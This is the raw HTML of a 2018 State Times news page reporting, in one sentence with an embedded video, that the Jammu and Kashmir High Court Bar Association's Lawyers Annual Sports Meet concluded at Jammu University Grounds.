href='http://news.statetimes.in/sonam-to-consult-author-anuja-chauhan-on-her-the-zoya-factor-role/' title='Sonam to consult author Anuja Chauhan on her &#8216;The Zoya Factor&#8217; role'> Sonam to consult author Anuja Chauhan on her &#8216;The Zoya Factor&#8217; role</a><span>  2 days ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/young-drivers-a-threat-for-others/">Young drivers a threat for others</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/quick-justice-needed-for-crimes-against-women/">Quick justice needed for crimes against women</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/khand-pranayama/">Khand Pranayama</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/with-an-eye-on-2019/">With an eye on 2019&#8230;</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/mild-exploration-of-publications-on-kashmir/">Mild exploration of publications on Kashmir</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/poor-solid-waste-mgmt/">Poor solid waste mgmt</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/vanishing-influence-of-the-left/">Vanishing influence of the Left</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/diplomatic-row/">Diplomatic row</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/">Lawyers Annual Sports Meet 2018 concludes</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/">Mobile internet services suspended in Kashmir Valley</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/bjym-supports-up-govt-move-to-introduce-ramji-as-middle-name-of-ambedkar/">BJYM supports UP govt move to introduce &#8216;Ramji&#8217; as middle name of Ambedkar</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/bharat-vikas-parishad-bvp-jk-holds-agm-at-ved-mandir-auditoium-in-ambphalla/">Bharat Vikas Parishad (BVP) J&#038;K holds AGM at Ved Mandir Auditoium in Ambphalla</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/joint-press-conference-by-aarakshan-virodhi-party-and-general-category-peoples-forum/">Joint press conference by Aarakshan Virodhi Party and General Category People&#8217;s Forum</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/abvp-activists-protest-against-cbse-chairperson-anita-karwal/">ABVP activists protest against CBSE chairperson Anita Karwal</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cag-raps-guj-over-lacunae-in-regulation-of-fishing-activities/">CAG raps Guj over lacunae in regulation of fishing activities</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/" title="News"><span itemprop="title">News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/jknews/" title="Jammu and Kashmir"><span itemprop="title">Jammu and Kashmir</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/jknews/jksports/" title="J&amp;K Sports"><span itemprop="title">J&amp;K Sports</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">Lawyers Annual Sports Meet 2018 concludes</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-345760 post type-post status-publish format-video has-post-thumbnail category-jksports category-video post_format-post-format-video"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2018/04/Lawyers-Annual-Sports-Meet-organised-by-JKHCBA-300x165.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2018-04-01T18:13:28+00:00"/>
  <meta itemprop="dateModified" content="2018-04-01T18:13:28+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">Lawyers Annual Sports Meet 2018 concludes</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2018-04-01T18:13:28+00:00" class="updated">April 01, 2018</time></span><span>In: <a href="http://news.statetimes.in/section/news/jknews/jksports/" title="View all posts in J&amp;K Sports">J&amp;K Sports</a>, <a href="http://news.statetimes.in/section/video/" title="View all posts in Video">Video</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=Lawyers Annual Sports Meet 2018 concludes&body=Lawyers Annual Sports Meet 2018 concludes http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="345760">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Lawyers Annual Sports Meet 2018 concludes&url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/&title=Lawyers Annual Sports Meet 2018 concludes&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2018/04/Lawyers-Annual-Sports-Meet-organised-by-JKHCBA.jpg&amp;
url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/&amp;
is_video=false&amp;description=Lawyers Annual Sports Meet 2018 concludes"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    <div class="video_wrap"><iframe width="600" height="400" src="//www.youtube.com/embed/u1alvIbLK3c"></iframe></div>
<p>Lawyers Annual Sports Meet, organised by Jammu and Kashmir High Court Bar Association (JKHCBA) Jammu at Jammu University Grounds concluded today.</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-443 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-443 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-443 .adr-next',
				prev: '.e3lanat-rotator-id-443 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-443" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="345760">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Lawyers Annual Sports Meet 2018 concludes&url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/&title=Lawyers Annual Sports Meet 2018 concludes&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2018/04/Lawyers-Annual-Sports-Meet-organised-by-JKHCBA.jpg&amp;
url=http://news.statetimes.in/lawyers-annual-sports-meet-2018-concludes/&amp;
is_video=false&amp;description=Lawyers Annual Sports Meet 2018 concludes"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/"><img src="http://news.statetimes.in/wp-content/uploads/2016/11/Congress-aghast-over-continuous-ban-on-mobile-internet-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/11/Congress-aghast-over-continuous-ban-on-mobile-internet-180x120.jpg" alt="Lawyers Annual Sports Meet 2018 concludes"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/">Mobile internet services suspended in Kashmir Valley</a></h3>
                        </div>
                    </li>
		    		                        <li class="np-post next border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/diplomatic-row/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Lawyers Annual Sports Meet 2018 concludes"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/diplomatic-row/" class="link next"><i class="fa-icon-double-angle-right alignright"></i>Next</a>
                            <h3><a href="http://news.statetimes.in/diplomatic-row/">Diplomatic row</a></h3>
                        </div>
                    </li>
		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/bharat-vikas-parishad-bvp-jk-holds-agm-at-ved-mandir-auditoium-in-ambphalla/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/Bharat-Vikas-Parishad-BVP-JK-holds-AGM-at-Ved-Mandir-Auditoium-in-Ambphalla-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/Bharat-Vikas-Parishad-BVP-JK-holds-AGM-at-Ved-Mandir-Auditoium-in-Ambphalla-610x352.jpg" alt="Bharat Vikas Parishad (BVP) J&K holds AGM at Ved Mandir Auditoium in Ambphalla"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/bharat-vikas-parishad-bvp-jk-holds-agm-at-ved-mandir-auditoium-in-ambphalla/">Bharat Vikas Parishad (BVP) J&#038;K holds AGM at Ved Mandir Auditoium in Ambphalla</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-04-01T16:15:29+00:00">April 01, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/joint-press-conference-by-aarakshan-virodhi-party-and-general-category-peoples-forum/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/Joint-press-conference-by-Aarakshan-Virodhi-Party-and-General-Category-Peoples-Forum-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/Joint-press-conference-by-Aarakshan-Virodhi-Party-and-General-Category-Peoples-Forum-610x352.jpg" alt="Joint press conference by Aarakshan Virodhi Party and General Category People's Forum"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/joint-press-conference-by-aarakshan-virodhi-party-and-general-category-peoples-forum/">Joint press conference by Aarakshan Virodhi Party and General Category People&#8217;s Forum</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-04-01T16:15:24+00:00">April 01, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/abvp-activists-protest-against-cbse-chairperson-anita-karwal/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/ABVP-activists-protest-against-CBSE-chairperson-Anita-Karwal-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/ABVP-activists-protest-against-CBSE-chairperson-Anita-Karwal-610x352.jpg" alt="ABVP activists protest against CBSE chairperson Anita Karwal"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/abvp-activists-protest-against-cbse-chairperson-anita-karwal/">ABVP activists protest against CBSE chairperson Anita Karwal</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-04-01T16:15:21+00:00">April 01, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/jammu-adhikar-manch-stages-protest-demonstration-at-press-club-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/jammu-adhikar-manch-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/jammu-adhikar-manch-610x354.jpg" alt="Jammu Adhikar Manch stages protest demonstration at Press Club Jammu"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/jammu-adhikar-manch-stages-protest-demonstration-at-press-club-jammu/">Jammu Adhikar Manch stages protest demonstration at Press Club Jammu</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-04-01T14:07:50+00:00">April 01, 2018</time>
			</div>
                </li>

	       <li>
